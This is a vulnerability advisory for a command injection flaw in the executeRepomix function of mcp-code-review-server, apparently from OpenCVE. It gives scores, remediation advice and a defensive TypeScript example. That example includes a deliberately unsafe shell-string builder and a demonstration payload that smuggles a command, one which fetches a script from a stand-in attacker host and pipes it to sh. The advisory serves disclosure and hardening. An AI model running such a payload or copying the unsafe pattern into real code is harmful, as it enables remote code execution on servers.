Description
A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
Published: 2026-05-02
Score: 5.3 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a command injection flaw in the executeRepomix function of the RepoMix Command Handler (src/repomix.ts) in mcp-code-review-server. Attacker-controlled input reaches a shell command line without being neutralised, so crafted input is executed by the host operating system as arbitrary commands with the privileges of the server process, compromising the confidentiality, integrity, and availability of the affected system. The flaw is classified as CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection') and CWE-77 (Improper Neutralization of Special Elements used in a Command, 'Command Injection').

Affected Systems

The issue affects the open‑source project crazyrabbitLTC:mcp-code-review-server, with all releases up to and including version 0.1.0 being vulnerable. No later updates are documented in the provided data, and the project has not yet released a fix.

Risk and Exploitability

The CVSS 4.0 base score of 5.3 (6.3 under CVSS 3.1) indicates moderate severity. The vectors rate the attack as network-reachable, low-complexity and requiring no user interaction, but needing low privileges (PR:L): the attacker must already be able to submit input to the tool that calls executeRepomix. Exploit maturity is rated proof-of-concept (E:P), and the description states that an exploit is public. No EPSS score is available yet, and the vulnerability is not listed in CISA's KEV catalog, so there is no confirmed in-the-wild exploitation. Because the flaw permits execution of arbitrary shell commands with the privileges of the server process, the impact is high on any instance an attacker can reach, and the absence of an official patch or workaround makes mitigation a priority.

Generated by OpenCVE AI on May 2, 2026 at 13:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply any vendor‑supplied patch or upgrade to a later release when available.
  • If a patch is unavailable, temporarily disable or remove the RepoMix executeRepomix feature, or locally change it so that user-controlled values never reach a shell (pass them as discrete arguments without shell interpretation and reject anything outside a strict allow-list).
  • Restrict network exposure of the mcp-code-review-server service to trusted hosts and clients and enforce strict firewall rules; only parties that can invoke the tool can reach the injection point.
  • Run the service under the least privileged account possible and isolate it from the host OS (container or sandbox with no credentials or secrets mounted), so that a successful injection is contained.
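The following is an added example, not code from the mcp-code-review-server project and not a reproduction of src/repomix.ts: it shows the generic shape of the bug class described in the Impact section beside the hardening the recommended actions call for. The request fields (repoPath, includePatterns, outputStyle), the allowed-root directory and the demonstration payload are all assumptions made for illustration; only the mitigation technique (strict allow-list validation, path confinement, and execFile with an argv array instead of a shell string) is the point.

```typescript
import { execFile } from "node:child_process";
import * as path from "node:path";

// Hypothetical request shape for a repomix-backed review tool; the real
// server's schema is not reproduced here and these field names are assumptions.
export interface RepomixRequest {
  repoPath: string;             // repository to pack, relative to an allowed root
  includePatterns?: string[];   // optional glob filters
  outputStyle?: string;         // expected: "xml" | "markdown" | "plain"
}

// VULNERABLE PATTERN (illustrative, not the project's code): request fields are
// interpolated into one string that is later handed to a shell (exec / shell: true).
// Any shell metacharacter in repoPath or a pattern becomes part of the command line.
export function buildShellCommandUnsafe(req: RepomixRequest): string {
  const include = req.includePatterns?.length
    ? ` --include "${req.includePatterns.join(",")}"`
    : "";
  return `npx repomix ${req.repoPath}${include} --style ${req.outputStyle ?? "xml"}`;
}

// HARDENED PATTERN: validate every field against a strict allow-list, confine the
// path to an approved root, and build an argv array for execFile (no shell).
const ALLOWED_STYLES = new Set(["xml", "markdown", "plain"]);
// Characters permitted in paths and glob patterns: no whitespace, quotes, $, ;, |, &, ` ...
const SAFE_CHARS = /^[A-Za-z0-9_.\/*,-]+$/;

export function buildArgvSafe(req: RepomixRequest, allowedRoot: string): string[] {
  const root = path.posix.resolve(allowedRoot);

  if (!SAFE_CHARS.test(req.repoPath) || req.repoPath.startsWith("-")) {
    throw new Error("repoPath contains disallowed characters");
  }
  // Canonicalise and confine: "../x" or an absolute path outside root is rejected.
  const target = path.posix.resolve(root, req.repoPath);
  if (target !== root && !target.startsWith(root + "/")) {
    throw new Error("repoPath escapes the allowed root");
  }

  const style = req.outputStyle ?? "xml";
  if (!ALLOWED_STYLES.has(style)) throw new Error("unknown output style");

  const argv = ["repomix", target, "--style", style];
  for (const pattern of req.includePatterns ?? []) {
    // Reject metacharacters and anything that could be parsed as an extra flag.
    if (!SAFE_CHARS.test(pattern) || pattern.startsWith("-")) {
      throw new Error(`rejected include pattern: ${pattern}`);
    }
    argv.push("--include", pattern);
  }
  return argv;
}

// Execute with execFile: arguments go to the child process directly, never
// through /bin/sh, so a value that slipped past validation is still one argv
// element rather than a command. The timeout bounds a hung or runaway child.
export function runRepomixSafe(req: RepomixRequest, allowedRoot: string): Promise<string> {
  const argv = buildArgvSafe(req, allowedRoot);
  return new Promise((resolve, reject) => {
    execFile(
      "npx",
      argv,
      { shell: false, timeout: 60_000, maxBuffer: 16 * 1024 * 1024 },
      (err, stdout, stderr) =>
        err ? reject(new Error(`repomix failed: ${stderr || err.message}`)) : resolve(stdout),
    );
  });
}

// Constructed demonstration payload (not taken from the advisory): a repoPath
// that carries a shell command separator and a second command.
export const DEMO_PAYLOAD: RepomixRequest = {
  repoPath: "myrepo; curl http://attacker.invalid/p | sh",
  outputStyle: "xml",
};

// Shows the two outcomes side by side: the unsafe builder produces a command
// line containing the injected command; the hardened builder refuses the input.
export function demo(): { unsafeCommand: string; safeRejected: boolean } {
  const unsafeCommand = buildShellCommandUnsafe(DEMO_PAYLOAD);
  let safeRejected = false;
  try {
    buildArgvSafe(DEMO_PAYLOAD, "/srv/repos");
  } catch {
    safeRejected = true;
  }
  return { unsafeCommand, safeRejected };
}
```

Calling demo() returns the unsafe command string with "; curl ... | sh" embedded in it and safeRejected set to true. The validation step matters even with execFile: a glob such as "$(id)" is harmless to execFile but would still reach repomix as an argument, and a value starting with "-" could be parsed by the tool as an option, so the allow-list is the first line of defence and the shell-free invocation the second.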

Tracking

Advisories

No advisories yet.

History

Sat, 02 May 2026 12:15:00 +0000

Type | Values Removed | Values Added
Description | (none) | A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
Title | (none) | crazyrabbitLTC mcp-code-review-server RepoMix repomix.ts executeRepomix command injection
Weaknesses | (none) | CWE-74, CWE-77
References | (none) | (none)
Metrics | (none) |
  cvssV2_0: {'score': 6.5, 'vector': 'AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR'}
  cvssV3_0: {'score': 6.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}
  cvssV3_1: {'score': 6.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}
  cvssV4_0: {'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P'}


Subscriptions

No data.

MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-02T12:00:14.660Z

Reserved: 2026-05-01T14:22:12.238Z

Link: CVE-2026-7628

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-02T12:16:17.163

Modified: 2026-05-02T12:16:17.163

Link: CVE-2026-7628

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-02T13:30:43Z

Weaknesses